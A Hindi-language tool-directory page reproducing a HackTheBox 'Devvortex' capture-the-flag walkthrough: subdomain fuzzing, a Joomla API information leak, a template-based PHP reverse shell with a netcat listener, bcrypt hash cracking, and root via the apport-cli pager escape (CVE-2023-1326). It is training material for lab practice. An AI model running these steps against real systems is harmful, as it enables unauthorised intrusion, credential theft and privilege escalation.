Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DEVVORTEX — HackTheBox Devvortex वॉकथ्रू जिसमें सबडोमेन फ़ज़िंग, Joomla API एन्यूमरेशन, टेम्पलेट-आधारित वेब शेल, bcrypt हैश क्रैकिंग, और Apport-CLI CVE-2023-1326 प्रिविलेज एस्केलेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/r3fr4kt/devvortex
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिभेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंगसबडोमेन एनुमरेशनलर्निंग और शिक्षालैब और अभ्यास
GitHubr3fr4kt/devvortex

DEVVORTEX

7घं 58मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HackTheBox Devvortex वॉकथ्रू जिसमें सबडोमेन फ़ज़िंग, Joomla API एन्यूमरेशन, टेम्पलेट-आधारित वेब शेल, bcrypt हैश क्रैकिंग, और Apport-CLI CVE-2023-1326 प्रिविलेज एस्केलेशन शामिल है।

रिपॉजिटरी देखें

DEVVORTEX

HackTheBox: Devvortex — मशीन राइट-अप

HackTheBox पर Devvortex मशीन के कम्प्रोमाइज़ का विस्तृत तकनीकी वॉकथ्रू। यह पथ सबडोमेन फ़ज़िंग, Joomla API एन्यूमरेशन, प्रारंभिक एक्सेस के लिए टेम्पलेट संशोधन, लेटरल मूवमेंट के लिए डेटाबेस हैश निष्कर्षण और क्रैकिंग, और रूट तक प्रिविलेज एस्केलेशन के लिए Apport-CLI (CVE-2023-1326) के शोषण को प्रदर्शित करता है।


कार्यकारी सारांश

  • लक्ष्य OS: Linux
  • कठिनाई: आसान
  • डोमेन: devvortex.htb
  • सबडोमेन: dev.devvortex.htb
  • मुख्य अवधारणाएँ: सबडोमेन एन्यूमरेशन, Joomla CMS शोषण, सूचना प्रकटीकरण, Bcrypt हैश क्रैकिंग, Sudo दुरुपयोग (apport-cli)।

1. रेकॉनिसेंस और एन्यूमरेशन

पोर्ट स्कैनिंग (Nmap)

सभी पोर्ट्स पर एक प्रारंभिक तेज़ TCP पोर्ट डिस्कवरी की गई:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

पहचाने गए खुले पोर्ट्स के विरुद्ध एक अनुवर्ती सेवा और संस्करण डिटेक्शन स्कैन निष्पादित किया गया:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

होस्टफ़ाइल कॉन्फ़िगरेशन

अपनी स्थानीय होस्टनेम रिज़ॉल्यूशन तालिका में बेस लक्ष्य डोमेन जोड़ें:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

सबडोमेन डिस्कवरी (FFUF)

अतिरिक्त वेब एसेट्स की पहचान के लिए वर्चुअल होस्ट्स को फ़ज़ करना:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

परिणाम: dev.devvortex.htb खोजा गया। /etc/hosts में dev.devvortex.htb जोड़ा गया।

डायरेक्टरी फ़ज़िंग

नए खोजे गए वर्चुअल होस्ट पर रूट्स की एन्यूमरेशन:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

परिणाम: /administrator एंडपॉइंट खोजा गया, जो एक Joomla एडमिन ऑथेंटिकेशन पोर्टल को उजागर करता है।

2. प्रारंभिक एक्सेस (फ़ुटहोल्ड)

Joomla API के माध्यम से सूचना लीकेज

संवेदनशील एप्लिकेशन मेट्रिक्स और उपयोगकर्ताओं को इकट्ठा करने के लिए Joomla के REST API द्वारा उजागर सार्वजनिक एंडपॉइंट्स की जाँच:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

साइट टेम्पलेट्स के माध्यम से वेब शेल इंजेक्शन

एन्यूमरेशन के दौरान पाए गए क्रेडेंशियल्स का उपयोग करके, Joomla /administrator पोर्टल में लॉग इन करें:

  1. System > Site Templates पर जाएँ।

  2. सक्रिय टेम्पलेट चुनें और error.php खोलें।

  3. error.php की सामग्री को एक मानक PHP रिवर्स शेल पेलोड से बदलें।

एक स्थानीय netcat लिसनर प्रारंभ करें:

Bash

root@kitploit:~
nc -lvnp 4444

एक अनुपस्थित पेज का अनुरोध करके या सीधे फ़ाइल को हिट करके error.php के निष्पादन को ट्रिगर करें।

TTY शेल स्थिरीकरण

एक बार शेल www-data के रूप में कनेक्ट हो जाने पर, एक इंटरैक्टिव PTY सत्र उत्पन्न करें:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. लेटरल मूवमेंट (Logan)

डेटाबेस एन्यूमरेशन

वेब कॉन्फ़िगरेशन फ़ाइलों से प्राप्त क्रेडेंशियल्स का उपयोग करके स्थानीय MySQL डेटाबेस तक पहुँचें:

Bash

root@kitploit:~
mysql -u lewis -p

संग्रहीत क्रेडेंशियल हैश का पता लगाने के लिए उपयोगकर्ता तालिका को क्वेरी करें:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

ऑफ़लाइन पासवर्ड क्रैकिंग

उपयोगकर्ता logan के लिए bcrypt पासवर्ड हैश को एक स्थानीय फ़ाइल में निकालें:

Bash

root@kitploit:~
nano hash.txt

rockyou.txt के साथ John the Ripper का उपयोग करके हैश को क्रैक करें:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SSH के माध्यम से प्रमाणीकरण

क्रैक किए गए क्रेडेंशियल्स के साथ उपयोगकर्ता logan के रूप में एक स्थायी SSH सत्र स्थापित करें:

Bash

root@kitploit:~
ssh [email protected]

यूज़र फ़्लैग

Bash

root@kitploit:~
cat user.txt

4. प्रिविलेज एस्केलेशन

Sudo प्रिविलेज ऑडिट

logan उपयोगकर्ता के लिए अनुमत बाइनरीज़ का निरीक्षण करें:

Bash

root@kitploit:~
sudo -l

आउटपुट: उपयोगकर्ता /usr/bin/apport-cli को root के रूप में चला सकता है।

Apport-CLI शोषण (CVE-2023-1326)

apport-cli के इंस्टॉल किए गए संस्करण की जाँच करें:

Bash

root@kitploit:~
apport-cli --version

मौजूदा रिपोर्ट फ़ाइलों के लिए /var/crash का निरीक्षण करें। यदि खाली है, तो मैन्युअल रूप से एक क्रैश फ़ाइल बनाएँ:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

sudo का उपयोग करके बनाई गई क्रैश फ़ाइल के विरुद्ध apport-cli लॉन्च करें:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. View report के लिए v दबाएँ।

  2. जब पेजिनेटर (less) सामग्री लोड करता है, तो निम्न दर्ज करके सिस्टम शेल में एस्केप करें:

Plaintext

root@kitploit:~
!/bin/bash

5. सिस्टम समेकन

root एलिवेशन सत्यापित करें:

Bash

root@kitploit:~
whoami
# Output: root

रूट फ़्लैग

Bash

root@kitploit:~
cat /root/root.txt
टूल डाउनलोड करें